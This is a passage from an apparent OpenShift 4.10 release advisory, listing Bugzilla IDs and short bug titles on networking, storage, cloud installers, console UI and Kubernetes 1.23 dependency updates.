CNO does not verify MTU migration for OpenShiftSDN\n2034155 - [OVN-K] [Multiple External Gateways] Per pod SNAT is disabled\n2034170 - Use function.knative.dev for Knative Functions related labels\n2034190 - unable to add new VirtIO disks to VMs\n2034192 - Prometheus fails to insert reporting metrics when the sample limit is met\n2034243 - regular user cant load template list\n2034245 - installing a cluster on aws, gcp always fails with \"Error: Incompatible provider version\"\n2034248 - GPU/Host device modal is too small\n2034257 - regular user `Create VM` missing permissions alert\n2034285 - [sig-api-machinery] API data in etcd should be stored at the correct location and version for all resources [Serial] [Suite:openshift/conformance/serial]\n2034287 - do not block upgrades if we can\u0027t create storageclass in 4.10 in vsphere\n2034300 - Du validator policy is NonCompliant after DU configuration completed\n2034319 - Negation constraint is not validating packages\n2034322 - CNO doesn\u0027t pick up settings required when ExternalControlPlane topology\n2034350 - The CNO should implement the Whereabouts IP reconciliation cron job\n2034362 - update description of disk interface\n2034398 - The Whereabouts IPPools CRD should include the podref field\n2034409 - Default CatalogSources should be pointing to 4.10 index images\n2034410 - Metallb BGP, BFD: prometheus is not scraping the frr metrics\n2034413 - cloud-network-config-controller fails to init with secret \"cloud-credentials\" not found in manual credential mode\n2034460 - Summary: cloud-network-config-controller does not account for different environment\n2034474 - Template\u0027s boot source is \"Unknown source\" before and after set enableCommonBootImageImport to true\n2034477 - [OVN] Multiple EgressIP objects configured, EgressIPs weren\u0027t working properly\n2034493 - Change cluster version operator log level\n2034513 - [OVN] After update one EgressIP in EgressIP object, one internal IP lost from lr-policy-list\n2034527 - IPI deployment fails \u0027timeout reached while inspecting the node\u0027 when provisioning network ipv6\n2034528 - [IBM VPC] volumeBindingMode should be WaitForFirstConsumer\n2034534 - Update ose-machine-api-provider-openstack images to be consistent with ART\n2034537 - Update team\n2034559 - KubeAPIErrorBudgetBurn firing outside recommended latency thresholds\n2034563 - [Azure] create machine with wrong ephemeralStorageLocation value success\n2034577 - Current OVN gateway mode should be reflected on node annotation as well\n2034621 - context menu not popping up for application group\n2034622 - Allow volume expansion by default in vsphere CSI storageclass 4.10\n2034624 - Warn about unsupported CSI driver in vsphere operator\n2034647 - missing volumes list in snapshot modal\n2034648 - Rebase openshift-controller-manager to 1.23\n2034650 - Rebase openshift/builder to 1.23\n2034705 - vSphere: storage e2e tests logging configuration data\n2034743 - EgressIP: assigning the same egress IP to a second EgressIP object after a ovnkube-master restart does not fail. \n2034766 - Special Resource Operator(SRO) - no cert-manager pod created in dual stack environment\n2034785 - ptpconfig with summary_interval cannot be applied\n2034823 - RHEL9 should be starred in template list\n2034838 - An external router can inject routes if no service is added\n2034839 - Jenkins sync plugin does not synchronize ConfigMap having label role=jenkins-agent\n2034879 - Lifecycle hook\u0027s name and owner shouldn\u0027t be allowed to be empty\n2034881 - Cloud providers components should use K8s 1.23 dependencies\n2034884 - ART cannot build the image because it tries to download controller-gen\n2034889 - `oc adm prune deployments` does not work\n2034898 - Regression in recently added Events feature\n2034957 - update openshift-apiserver to kube 1.23.1\n2035015 - ClusterLogForwarding CR remains stuck remediating forever\n2035093 - openshift-cloud-network-config-controller never runs on Hypershift cluster\n2035141 - [RFE] Show GPU/Host devices in template\u0027s details tab\n2035146 - \"kubevirt-plugin~PVC cannot be empty\" shows on add-disk modal while adding existing PVC\n2035167 - [cloud-network-config-controller] unable to deleted cloudprivateipconfig when deleting\n2035199 - IPv6 support in mtu-migration-dispatcher.yaml\n2035239 - e2e-metal-ipi-virtualmedia tests are permanently failing\n2035250 - Peering with ebgp peer over multi-hops doesn\u0027t work\n2035264 - [RFE] Provide a proper message for nonpriv user who not able to add PCI devices\n2035315 - invalid test cases for AWS passthrough mode\n2035318 - Upgrade management workflow needs to allow custom upgrade graph path for disconnected env\n2035321 - Add Sprint 211 translations\n2035326 - [ExternalCloudProvider] installation with additional network on workers fails\n2035328 - Ccoctl does not ignore credentials request manifest marked for deletion\n2035333 - Kuryr orphans ports on 504 errors from Neutron\n2035348 - Fix two grammar issues in kubevirt-plugin.json strings\n2035393 - oc set data --dry-run=server makes persistent changes to configmaps and secrets\n2035409 - OLM E2E test depends on operator package that\u0027s no longer published\n2035439 - SDN Automatic assignment EgressIP on GCP returned node IP adress not egressIP address\n2035453 - [IPI on Alibabacloud] 2 worker machines stuck in Failed phase due to connection to \u0027ecs-cn-hangzhou.aliyuncs.com\u0027 timeout, although the specified region is \u0027us-east-1\u0027\n2035454 - [IPI on Alibabacloud] the OSS bucket created during installation for image registry is not deleted after destroying the cluster\n2035467 - UI: Queried metrics can\u0027t be ordered on Oberve-\u003eMetrics page\n2035494 - [SDN Migration]ovnkube-node pods CrashLoopBackOff after sdn migrated to ovn for RHEL workers\n2035515 - [IBMCLOUD] allowVolumeExpansion should be true in storage class\n2035602 - [e2e][automation] add tests for Virtualization Overview page cards\n2035703 - Roles -\u003e RoleBindings tab doesn\u0027t show RoleBindings correctly\n2035704 - RoleBindings list page filter doesn\u0027t apply\n2035705 - Azure \u0027Destroy cluster\u0027 get stuck when the cluster resource group is already not existing. \n2035757 - [IPI on Alibabacloud] one master node turned NotReady which leads to installation failed\n2035772 - AccessMode and VolumeMode is not reserved for customize wizard\n2035847 - Two dashes in the Cronjob / Job pod name\n2035859 - the output of opm render doesn\u0027t contain olm.constraint which is defined in dependencies.yaml\n2035882 - [BIOS setting values] Create events for all invalid settings in spec\n2035903 - One redundant capi-operator credential requests in \u201coc adm extract --credentials-requests\u201d\n2035910 - [UI] Manual approval options are missing after ODF 4.10 installation starts when Manual Update approval is chosen\n2035927 - Cannot enable HighNodeUtilization scheduler profile\n2035933 - volume mode and access mode are empty in customize wizard review tab\n2035969 - \"ip a \" shows \"Error: Peer netns reference is invalid\" after create test pods\n2035986 - Some pods under kube-scheduler/kube-controller-manager are using the deprecated annotation\n2036006 - [BIOS setting values] Attempt to set Integer parameter results in preparation error\n2036029 - New added cloud-network-config operator doesn\u2019t supported aws sts format credential\n2036096 - [azure-file-csi-driver] there are no e2e tests for NFS backend\n2036113 - cluster scaling new nodes ovs-configuration fails on all new nodes\n2036567 - [csi-driver-nfs] Upstream merge: Bump k8s libraries to 1.23\n2036569 - [cloud-provider-openstack] Upstream merge: Bump k8s libraries to 1.23\n2036577 - OCP 4.10 nightly builds from 4.10.0-0.nightly-s390x-2021-12-18-034912 to 4.10.0-0.nightly-s390x-2022-01-11-233015 fail to upgrade from OCP 4.9.11 and 4.9.12 for network type OVNKubernetes for zVM hypervisor environments\n2036622 - sdn-controller crashes when restarted while a previous egress IP assignment exists\n2036717 - Valid AlertmanagerConfig custom resource with valid a mute time interval definition is rejected\n2036826 - `oc adm prune deployments` can prune the RC/RS\n2036827 - The ccoctl still accepts CredentialsRequests without ServiceAccounts on GCP platform\n2036861 - kube-apiserver is degraded while enable multitenant\n2036937 - Command line tools page shows wrong download ODO link\n2036940 - oc registry login fails if the file is empty or stdout\n2036951 - [cluster-csi-snapshot-controller-operator] proxy settings is being injected in container\n2036989 - Route URL copy to clipboard button wraps to a separate line by itself\n2036990 - ZTP \"DU Done inform policy\" never becomes compliant on multi-node clusters\n2036993 - Machine API components should use Go lang version 1.17\n2037036 - The tuned profile goes into degraded status and ksm.service is displayed in the log. \n2037061 - aws and gcp CredentialsRequest manifests missing ServiceAccountNames list for cluster-api\n2037073 - Alertmanager container fails to start because of startup probe never being successful\n2037075 - Builds do not support CSI volumes\n2037167 - Some log level in ibm-vpc-block-csi-controller are hard code\n2037168 - IBM-specific Deployment manifest for package-server-manager should be excluded on non-IBM cluster-profiles\n2037182 - PingSource badge color is not matched with knativeEventing color\n2037203 - \"Running VMs\" card is too small in Virtualization Overview\n2037209 - [IPI on Alibabacloud] worker nodes are put in the default resource group unexpectedly\n2037237 - Add \"This is a CD-ROM boot source\" to customize wizard\n2037241 - default TTL for noobaa cache buckets should be 0\n2037246 - Cannot customize auto-update boot source\n2037276 - [IBMCLOUD] vpc-node-label-updater may fail to label nodes appropriately\n2037288 - Remove stale image reference\n2037331 - Ensure the ccoctl behaviors are similar between aws and gcp on the existing resources\n2037483 - Rbacs for Pods within the CBO should be more restrictive\n2037484 - Bump dependencies to k8s 1.23\n2037554 - Mismatched wave number error message should include the wave numbers that are in conflict\n2037622 - [4.10-Alibaba CSI driver][Restore size for volumesnapshot/volumesnapshotcontent is showing as 0 in Snapshot feature for Alibaba platform]\n2037635 - impossible to configure custom certs for default console route in ingress config\n2037637 - configure custom certificate for default console route doesn\u0027t take effect for OCP \u003e= 4.8\n2037638 - Builds do not support CSI volumes as volume sources\n2037664 - text formatting issue in Installed Operators list table\n2037680 - [IPI on Alibabacloud] sometimes operator \u0027cloud-controller-manager\u0027 tells empty VERSION, due to conflicts on listening tcp :8080\n2037689 - [IPI on Alibabacloud] sometimes operator \u0027cloud-controller-manager\u0027 tells empty VERSION, due to conflicts on listening tcp :8080\n2037801 - Serverless installation is failing on CI jobs for e2e tests\n2037813 - Metal Day 1 Networking - networkConfig Field Only Accepts String Format\n2037856 - use lease for leader election\n2037891 - 403 Forbidden error shows for all the graphs in each grafana dashboard after upgrade from 4.9 to 4.10\n2037903 - Alibaba Cloud: delete-ram-user requires the credentials-requests\n2037904 - upgrade operator deployment failed due to memory limit too low for manager container\n2038021 - [4.10-Alibaba CSI driver][Default volumesnapshot class is not added/present after successful cluster installation]\n2038034 - non-privileged user cannot see auto-update boot source\n2038053 - Bump dependencies to k8s 1.23\n2038088 - Remove ipa-downloader references\n2038160 - The `default` project missed the annotation : openshift.io/node-selector: \"\"\n2038166 - Starting from Go 1.17 invalid certificates will render a cluster non-functional\n2038196 - must-gather is missing collecting some metal3 resources\n2038240 - Error when configuring a file using permissions bigger than decimal 511 (octal 0777)\n2038253 - Validator Policies are long lived\n2038272 - Failures to build a PreprovisioningImage are not reported\n2038384 - Azure Default Instance Types are Incorrect\n2038389 - Failing test: [sig-arch] events should not repeat pathologically\n2038412 - Import page calls the git file list unnecessarily twice from GitHub/GitLab/Bitbucket\n2038465 - Upgrade chromedriver to 90.x to support Mac M1 chips\n2038481 - kube-controller-manager-guard and openshift-kube-scheduler-guard pods being deleted and restarted on a cordoned node when drained\n2038596 - Auto egressIP for OVN cluster on GCP: After egressIP object is deleted, egressIP still takes effect\n2038663 - update kubevirt-plugin OWNERS\n2038691 - [AUTH-8] Panic on user login when the user belongs to a group in the IdP side and the group already exists via \"oc adm groups new\"\n2038705 - Update ptp reviewers\n2038761 - Open Observe-\u003eTargets page, wait for a while, page become blank\n2038768 - All the filters on the Observe-\u003eTargets page can\u0027t work\n2038772 - Some monitors failed to display on Observe-\u003eTargets page\n2038793 - [SDN EgressIP] After reboot egress node, the egressip was lost from egress node\n2038827 - should add user containers in /etc/subuid and /etc/subgid to support run pods in user namespaces\n2038832 - New templates for centos stream8 are missing registry suggestions in create vm wizard\n2038840 - [SDN EgressIP]cloud-network-config-controller pod was CrashLoopBackOff after some operation\n2038864 - E2E tests fail because multi-hop-net was not created\n2038879 - All Builds are getting listed in DeploymentConfig under workloads on OpenShift Console\n2038934 - CSI driver operators should use the trusted CA bundle when cluster proxy is configured\n2038968 - Move feature gates from a carry patch to openshift/api\n2039056 - Layout issue with breadcrumbs on API explorer page\n2039057 - Kind column is not wide enough in API explorer page\n2039064 - Bulk Import e2e test flaking at a high rate\n2039065 - Diagnose and fix Bulk Import e2e test that was previously disabled\n2039085 - Cloud credential operator configuration failing to apply in hypershift/ROKS clusters\n2039099 - [OVN EgressIP GCP] After reboot egress node, egressip that was previously assigned got lost\n2039109 - [FJ OCP4.10 Bug]: startironic.sh failed to pull the image of image-customization container when behind a proxy\n2039119 - CVO hotloops on Service openshift-monitoring/cluster-monitoring-operator\n2039170 - [upgrade]Error shown on registry operator \"missing the cloud-provider-config configmap\" after upgrade\n2039227 - Improve image customization server parameter passing during installation\n2039241 - Improve image customization server parameter passing during installation\n2039244 - Helm Release revision history page crashes the UI\n2039294 - SDN controller metrics cannot be consumed correctly by prometheus\n2039311 - oc Does Not Describe Build CSI Volumes\n2039315 - Helm release list page should only fetch secrets for deployed charts\n2039321 - SDN controller metrics are not being consumed by prometheus\n2039330 - Create NMState button doesn\u0027t work in OperatorHub web console\n2039339 - cluster-ingress-operator should report Unupgradeable if user has modified the aws resources annotations\n2039345 - CNO does not verify the minimum MTU value for IPv6/dual-stack clusters. \n2039359 - `oc adm prune deployments` can\u0027t prune the RS where the associated Deployment no longer exists\n2039382 - gather_metallb_logs does not have execution permission\n2039406 - logout from rest session after vsphere operator sync is finished\n2039408 - Add GCP region northamerica-northeast2 to allowed regions\n2039414 - Cannot see the weights increased for NodeAffinity, InterPodAffinity, TaintandToleration\n2039425 - No need to set KlusterletAddonConfig CR applicationManager-\u003eenabled: true in RAN ztp deployment\n2039491 - oc - git:// protocol used in unit tests\n2039516 - Bump OVN to ovn21.12-21.12.0-25\n2039529 - Project Dashboard Resource Quotas Card empty state test flaking at a high rate\n2039534 - Diagnose and fix Project Dashboard Resource Quotas Card test that was previously disabled\n2039541 - Resolv-prepender script duplicating entries\n2039586 - [e2e] update centos8 to centos stream8\n2039618 - VM created from SAP HANA template leads to 404 page if leave one network parameter empty\n2039619 - [AWS] In tree provisioner storageclass aws disk type should contain \u0027gp3\u0027 and csi provisioner storageclass default aws disk type should be \u0027gp3\u0027\n2039670 - Create PDBs for control plane components\n2039678 - Page goes blank when create image pull secret\n2039689 - [IPI on Alibabacloud] Pay-by-specification NAT is no longer supported\n2039743 - React missing key warning when open operator hub detail page (and maybe others as well)\n2039756 - React missing key warning when open KnativeServing details\n2039770 - Observe dashboard doesn\u0027t react on time-range changes after browser reload when perspective is changed in another tab\n2039776 - Observe dashboard shows nothing if the URL links to an non existing dashboard\n2039781 - [GSS] OBC is not visible by admin of a Project on Console\n2039798 - Contextual binding with Operator backed service creates visual connector instead of Service binding connector\n2039868 - Insights Advisor widget is not in the disabled state when the Insights Operator is disabled\n2039880 - Log level too low for control plane metrics\n2039919 - Add E2E test for router compression feature\n2039981 - ZTP for standard clusters installs stalld on master nodes\n2040132 - Flag --port has been deprecated, This flag has no effect now and will be removed in v1.24. You can use --secure-port instead\n2040136 - external-dns-operator pod keeps restarting and reports error: timed out waiting for cache to be synced\n2040143 - [IPI on Alibabacloud] suggest to remove region \"cn-nanjing\" or provide better error message\n2040150 - Update ConfigMap keys for IBM HPCS\n2040160 - [IPI on Alibabacloud] installation fails when region does not support pay-by-bandwidth\n2040285 - Bump build-machinery-go for console-operator to pickup change in yaml-patch repository\n2040357 - bump OVN to ovn-2021-21.12.0-11.el8fdp\n2040376 - \"unknown instance type\" error for supported m6i.xlarge instance\n2040394 - Controller: enqueue the failed configmap till services update\n2040467 - Cannot build ztp-site-generator container image\n2040504 - Change AWS EBS GP3 IOPS in MachineSet doesn\u0027t take affect in OpenShift 4\n2040521 - RouterCertsDegraded certificate could not validate route hostname v4-0-config-system-custom-router-certs.apps\n2040535 - Auto-update boot source is not available in customize wizard\n2040540 - ovs hardware offload: ovsargs format error when adding vf netdev name\n2040603 - rhel worker scaleup playbook failed because missing some dependency of podman\n2040616 - rolebindings page doesn\u0027t load for normal users\n2040620 - [MAPO] Error pulling MAPO image on installation\n2040653 - Topology sidebar warns that another component is updated while rendering\n2040655 - User settings update fails when selecting application in topology sidebar\n2040661 - Different react warnings about updating state on unmounted components when leaving topology\n2040670 - Permafailing CI job: periodic-ci-openshift-release-master-nightly-4.10-e2e-gcp-libvirt-cert-rotation\n2040671 - [Feature:IPv6DualStack] most tests are failing in dualstack ipi\n2040694 - Three upstream HTTPClientConfig struct fields missing in the operator\n2040705 - Du policy for standard cluster runs the PTP daemon on masters and workers\n2040710 - cluster-baremetal-operator cannot update BMC subscription CR\n2040741 - Add CI test(s) to ensure that metal3 components are deployed in vSphere, OpenStack and None platforms\n2040782 - Import YAML page blocks input with more then one generateName attribute\n2040783 - The Import from YAML summary page doesn\u0027t show the resource name if created via generateName attribute\n2040791 - Default PGT policies must be \u0027inform\u0027 to integrate with the Lifecycle Operator\n2040793 - Fix snapshot e2e failures\n2040880 - do not block upgrades if we can\u0027t connect to vcenter\n2041087 - MetalLB: MetalLB CR is not upgraded automatically from 4.9 to 4.10\n2041093 - autounattend.xml missing\n2041204 - link to templates in virtualization-cluster-overview inventory card is to all templates\n2041319 - [IPI on Alibabacloud] installation in region \"cn-shanghai\" failed, due to \"Resource alicloud_vswitch CreateVSwitch Failed...InvalidCidrBlock.Overlapped\"\n2041326 - Should bump cluster-kube-descheduler-operator to kubernetes version V1.23\n2041329 - aws and gcp CredentialsRequest manifests missing ServiceAccountNames list for cloud-network-config-controller\n2041361 - [IPI on Alibabacloud] Disable session persistence and removebBandwidth peak of listener\n2041441 - Provision volume with size 3000Gi even if sizeRange: \u0027[10-2000]GiB\u0027 in storageclass on IBM cloud\n2041466 - Kubedescheduler version is missing from the operator logs\n2041475 - React components should have a (mostly) unique name in react dev tools to simplify code analyses\n2041483 - MetallB: quay.io/openshift/origin-kube-rbac-proxy:4.10 deploy Metallb CR is missing (controller and speaker pods)\n2041492 - Spacing between resources in inventory card is too small\n2041509 - GCP Cloud provider components should use K8s 1.23 dependencies\n2041510 - cluster-baremetal-operator doesn\u0027t run baremetal-operator\u0027s subscription webhook\n2041541 - audit: ManagedFields are dropped using API not annotation\n2041546 - ovnkube: set election timer at RAFT cluster creation time\n2041554 - use lease for leader election\n2041581 - KubeDescheduler operator log shows \"Use of insecure cipher detected\"\n2041583 - etcd and api server cpu mask interferes with a guaranteed workload\n2041598 - Including CA bundle in Azure Stack cloud config causes MCO failure\n2041605 - Dynamic Plugins: discrepancy in proxy alias documentation/implementation\n2041620 - bundle CSV alm-examples does not parse\n2041641 - Fix inotify leak and kubelet retaining memory\n2041671 - Delete templates leads to 404 page\n2041694 - [IPI on Alibabacloud] installation fails when region does not support the cloud_essd disk category\n2041734 - ovs hwol: VFs are unbind when switchdev mode is enabled\n2041750 - [IPI on Alibabacloud] trying \"create install-config\" with region \"cn-wulanchabu (China (Ulanqab))\" (or \"ap-southeast-6 (Philippines (Manila))\", \"cn-guangzhou (China (Guangzhou))\") failed due to invalid endpoint\n2041763 - The Observe \u003e Alerting pages no longer have their default sort order applied\n2041830 - CI: ovn-kubernetes-master-e2e-aws-ovn-windows is broken\n2041854 - Communities / Local prefs are applied to all the services regardless of the pool, and only one community is applied\n2041882 - cloud-network-config operator can\u0027t work normal on GCP workload identity cluster\n2041888 - Intermittent incorrect build to run correlation, leading to run status updates applied to wrong build, builds stuck in non-terminal phases\n2041926 - [IPI on Alibabacloud] Installer ignores public zone when it does not exist\n2041971 - [vsphere] Reconciliation of mutating webhooks didn\u0027t happen\n2041989 - CredentialsRequest manifests being installed for ibm-cloud-managed profile\n2041999 - [PROXY] external dns pod cannot recognize custom proxy CA\n2042001 - unexpectedly found multiple load balancers\n2042029 - kubedescheduler fails to install completely\n2042036 - [IBMCLOUD] \"openshift-install explain installconfig.platform.ibmcloud\" contains not yet supported custom vpc parameters\n2042049 - Seeing warning related to unrecognized feature gate in kubescheduler \u0026 KCM logs\n2042059 - update discovery burst to reflect lots of CRDs on openshift clusters\n2042069 - Revert toolbox to rhcos-toolbox\n2042169 - Can not delete egressnetworkpolicy in Foreground propagation\n2042181 - MetalLB: User should not be allowed add same bgp advertisement twice in BGP address pool\n2042265 - [IBM]\"--scale-down-utilization-threshold\" doesn\u0027t work on IBMCloud\n2042274 - Storage API should be used when creating a PVC\n2042315 - Baremetal IPI deployment with IPv6 control plane and disabled provisioning network fails as the nodes do not pass introspection\n2042366 - Lifecycle hooks should be independently managed\n2042370 - [IPI on Alibabacloud] installer panics when the zone does not have an enhanced NAT gateway\n2042382 - [e2e][automation] CI takes more then 2 hours to run\n2042395 - Add prerequisites for active health checks test\n2042438 - Missing rpms in openstack-installer image\n2042466 - Selection does not happen when switching from Topology Graph to List View\n2042493 - No way to verify if IPs with leading zeros are still valid in the apiserver\n2042567 - insufficient info on CodeReady Containers configuration\n2042600 - Alone, the io.kubernetes.cri-o.Devices option poses a security risk\n2042619 - Overview page of the console is broken for hypershift clusters\n2042655 - [IPI on Alibabacloud] cluster becomes unusable if there is only one kube-apiserver pod running\n2042711 - [IBMCloud] Machine Deletion Hook cannot work on IBMCloud\n2042715 - [AliCloud] Machine Deletion Hook cannot work on AliCloud\n2042770 - [IPI on Alibabacloud] with vpcID \u0026 vswitchIDs specified, the installer would still try creating NAT gateway unexpectedly\n2042829 - Topology performance: HPA was fetched for each Deployment (Pod Ring)\n2042851 - Create template from SAP HANA template flow - VM is created instead of a new template\n2042906 - Edit machineset with same machine deletion hook name succeed\n2042960 - azure-file CI fails with \"gid(0) in storageClass and pod fsgroup(1000) are not equal\"\n2043003 - [IPI on Alibabacloud] \u0027destroy cluster\u0027 of a failed installation (bug2041694) stuck after \u0027stage=Nat gateways\u0027\n2043042 - [Serial] [sig-auth][Feature:OAuthServer] [RequestHeaders] [IdP] test RequestHeaders IdP [Suite:openshift/conformance/serial]\n2043043 - Cluster Autoscaler should use K8s 1.23 dependencies\n2043064 - Topology performance: Unnecessary rerenderings in topology nodes (unchanged mobx props)\n2043078 - Favorite system projects not visible in the project selector after toggling \"Show default projects\". \n2043117 - Recommended operators links are erroneously treated as external\n2043130 - Update CSI sidecars to the latest release for 4.10\n2043234 - Missing validation when creating several BGPPeers with the same peerAddress\n2043240 - Sync openshift/descheduler with sigs.k8s.io/descheduler\n2043254 - crio does not bind the security profiles directory\n2043296 - Ignition fails when reusing existing statically-keyed LUKS volume\n2043297 - [4.10] Bootimage bump tracker\n2043316 - RHCOS VM fails to boot on Nutanix AOS\n2043446 - Rebase aws-efs-utils to the latest upstream version. \n2043556 - Add proper ci-operator configuration to ironic and ironic-agent images\n2043577 - DPU network operator\n2043651 - Fix bug with exp. backoff working correcly when setting nextCheck in vsphere operator\n2043675 - Too many machines deleted by cluster autoscaler when scaling down\n2043683 - Revert bug 2039344 Ignoring IPv6 addresses against etcd cert validation\n2043709 - Logging flags no longer being bound to command line\n2043721 - Installer bootstrap hosts using outdated kubelet containing bugs\n2043731 - [IBMCloud] terraform outputs missing for ibmcloud bootstrap and worker ips for must-gather\n2043759 - Bump cluster-ingress-operator to k8s.io/api 1.23\n2043780 - Bump router to k8s.io/api 1.23\n2043787 - Bump cluster-dns-operator to k8s.io/api 1.23\n2043801 - Bump CoreDNS to k8s.io/api 1.23\n2043802 - EgressIP stopped working after single egressIP for a netnamespace is switched to the other node of HA pair after the first egress node is shutdown\n2043961 - [OVN-K] If pod creation fails, retry doesn\u0027t work as expected. \n2044201 - Templates golden image parameters names should be supported\n2044244 - Builds are failing after upgrading the cluster with builder image [jboss-webserver-5/jws56-openjdk8-openshift-rhel8]\n2044248 - [IBMCloud][vpc.block.csi.ibm.io]Cluster common user use the storageclass without parameter \u201ccsi.storage.k8s.io/fstype\u201d create pvc,pod successfully but write data to the pod\u0027s volume failed of \"Permission denied\"\n2044303 - [ovn][cloud-network-config-controller] cloudprivateipconfigs ips were left after deleting egressip objects\n2044347 - Bump to kubernetes 1.23.3\n2044481 - collect sharedresource cluster scoped instances with must-gather\n2044496 - Unable to create hardware events subscription - failed to add finalizers\n2044628 - CVE-2022-21673 grafana: Forward OAuth Identity Token can allow users to access some data sources\n2044680 - Additional libovsdb performance and resource consumption fixes\n2044704 - Observe \u003e Alerting pages should not show runbook links in 4.10\n2044717 - [e2e] improve tests for upstream test environment\n2044724 - Remove namespace column on VM list page when a project is selected\n2044745 - Upgrading cluster from 4.9 to 4.10 on Azure (ARO) causes the cloud-network-config-controller pod to CrashLoopBackOff\n2044808 - machine-config-daemon-pull.service: use `cp` instead of `cat` when extracting MCD in OKD\n2045024 - CustomNoUpgrade alerts should be ignored\n2045112 - vsphere-problem-detector has missing rbac rules for leases\n2045199 - SnapShot with Disk Hot-plug hangs\n2045561 - Cluster Autoscaler should use the same default Group value as Cluster API\n2045591 - Reconciliation of aws pod identity mutating webhook did not happen\n2045849 - Add Sprint 212 translations\n2045866 - MCO Operator pod spam \"Error creating event\" warning messages in 4.10\n2045878 - Sync upstream 1.16.0 downstream; includes hybrid helm plugin\n2045916 - [IBMCloud] Default machine profile in installer is unreliable\n2045927 - [FJ OCP4.10 Bug]: Podman failed to pull the IPA image due to the loss of proxy environment\n2046025 - [IPI on Alibabacloud] pre-configured alicloud DNS private zone is deleted after destroying cluster, please clarify\n2046137 - oc output for unknown commands is not human readable\n2046296 - When creating multiple consecutive egressIPs on GCP not all of them get assigned to the instance\n2046297 - Bump DB reconnect timeout\n2046517 - In Notification drawer, the \"Recommendations\" header shows when there isn\u0027t any recommendations\n2046597 - Observe \u003e Targets page may show the wrong service monitor is multiple monitors have the same namespace \u0026 label selectors\n2046626 - Allow setting custom metrics for Ansible-based Operators\n2046683 - [AliCloud]\"--scale-down-utilization-threshold\" doesn\u0027t work on AliCloud\n2047025 - Installation fails because of Alibaba CSI driver operator is degraded\n2047190 - Bump Alibaba CSI driver for 4.10\n2047238 - When using communities and localpreferences together, only localpreference gets applied\n2047255 - alibaba: resourceGroupID not found\n2047258 - [aws-usgov] fatal error occurred if AMI is not provided for AWS GovCloud regions\n2047317 - Update HELM OWNERS files under Dev Console\n2047455 - [IBM Cloud] Update custom image os type\n2047496 - Add image digest feature\n2047779 - do not degrade cluster if storagepolicy creation fails\n2047927 - \u0027oc get project\u0027 caused \u0027Observed a panic: cannot deep copy core.NamespacePhase\u0027 when AllRequestBodies is used\n2047929 - use lease for leader election\n2047975 - [sig-network][Feature:Router] The HAProxy router should override the route host for overridden domains with a custom value [Skipped:Disconnected] [Suite:openshift/conformance/parallel]\n2048046 - New route annotation to show another URL or hide topology URL decorator doesn\u0027t work for Knative Services\n2048048 - Application tab in User Preferences dropdown menus are too wide. \n2048050 - Topology list view items are not highlighted on keyboard navigation\n2048117 - [IBM]Shouldn\u0027t change status.storage.bucket and status.storage.resourceKeyCRN when update sepc.stroage,ibmcos with invalid value\n2048413 - Bond CNI: Failed to attach Bond NAD to pod\n2048443 - Image registry operator panics when finalizes config deletion\n2048478 - [alicloud] CCM deploys alibaba-cloud-controller-manager from quay.io/openshift/origin-*\n2048484 - SNO: cluster-policy-controller failed to start due to missing serving-cert/tls.crt\n2048598 - Web terminal view is broken\n2048836 - ovs-configure mis-detecting the ipv6 status on IPv4 only cluster causing Deployment failure\n2048891 - Topology page is crashed\n2049003 - 4.10: [IBMCloud] ibm-vpc-block-csi-node does not specify an update strategy, only resource requests, or priority class\n2049043 - Cannot create VM from template\n2049156 - \u0027oc get project\u0027 caused \u0027Observed a panic: cannot deep copy core.NamespacePhase\u0027 when AllRequestBodies is used\n2049886 - Placeholder bug for OCP 4.10.0 metadata release\n2049890 - Warning annotation for pods with cpu requests or limits on single-node OpenShift cluster without workload partitioning\n2050189 - [aws-efs-csi-driver] Merge upstream changes since v1.3.2\n2050190 - [aws-ebs-csi-driver] Merge upstream changes since v1.2.0\n2050227 - Installation on PSI fails with: \u0027openstack platform does not have the required standard-attr-tag network extension\u0027\n2050247 - Failing test in periodics: [sig-network] Services should respect internalTrafficPolicy=Local Pod and Node, to Pod (hostNetwork: true) [Feature:ServiceInternalTrafficPolicy] [Skipped:Network/OVNKubernetes] [Suite:openshift/conformance/parallel] [Suite:k8s]\n2050250 - Install fails to bootstrap, complaining about DefragControllerDegraded and sad members\n2050310 - ContainerCreateError when trying to launch large (\u003e500) numbers of pods across nodes\n2050370 - alert data for burn budget needs to be updated to prevent regression\n2050393 - ZTP missing support for local image registry and custom machine config\n2050557 - Can not push images to image-registry when enabling KMS encryption in AlibabaCloud\n2050737 - Remove metrics and events for master port offsets\n2050801 - Vsphere upi tries to access vsphere during manifests generation phase\n2050883 - Logger object in LSO does not log source location accurately\n2051692 - co/image-registry is degrade because ImagePrunerDegraded: Job has reached the specified backoff limit\n2052062 - Whereabouts should implement client-go 1.22+\n2052125 - [4.10] Crio appears to be coredumping in some scenarios\n2052210 - [aws-c2s] kube-apiserver crashloops due to missing cloud config\n2052339 - Failing webhooks will block an upgrade to 4.10 mid-way through the upgrade. \n2052458 - [IBM Cloud] ibm-vpc-block-csi-controller does not specify an update strategy, priority class, or only resource requests\n2052598 - kube-scheduler should use configmap lease\n2052599 - kube-controller-manger should use configmap lease\n2052600 - Failed to scaleup RHEL machine against OVN cluster due to jq tool is required by configure-ovs.sh\n2052609 - [vSphere CSI driver Operator] RWX volumes counts metrics `vsphere_rwx_volumes_total` not valid\n2052611 - MetalLB: BGPPeer object does not have ability to set ebgpMultiHop\n2052612 - MetalLB: Webhook Validation: Two BGPPeers instances can have different router ID set. \n2052644 - Infinite OAuth redirect loop post-upgrade to 4.10.0-rc.1\n2052666 - [4.10.z] change gitmodules to rhcos-4.10 branch\n2052756 - [4.10] PVs are not being cleaned up after PVC deletion\n2053175 - oc adm catalog mirror throws \u0027missing signature key\u0027 error when using file://local/index\n2053218 - ImagePull fails with error \"unable to pull manifest from example.com/busy.box:v5 invalid reference format\"\n2053252 - Sidepanel for Connectors/workloads in topology shows invalid tabs\n2053268 - inability to detect static lifecycle failure\n2053314 - requestheader IDP test doesn\u0027t wait for cleanup, causing high failure rates\n2053323 - OpenShift-Ansible BYOH Unit Tests are Broken\n2053339 - Remove dev preview badge from IBM FlashSystem deployment windows\n2053751 - ztp-site-generate container is missing convenience entrypoint\n2053945 - [4.10] Failed to apply sriov policy on intel nics\n2054109 - Missing \"app\" label\n2054154 - RoleBinding in project without subject is causing \"Project access\" page to fail\n2054244 - Latest pipeline run should be listed on the top of the pipeline run list\n2054288 - console-master-e2e-gcp-console is broken\n2054562 - DPU network operator 4.10 branch need to sync with master\n2054897 - Unable to deploy hw-event-proxy operator\n2055193 - e2e-metal-ipi-serial-ovn-ipv6 is failing frequently\n2055358 - Summary Interval Hardcoded in PTP Operator if 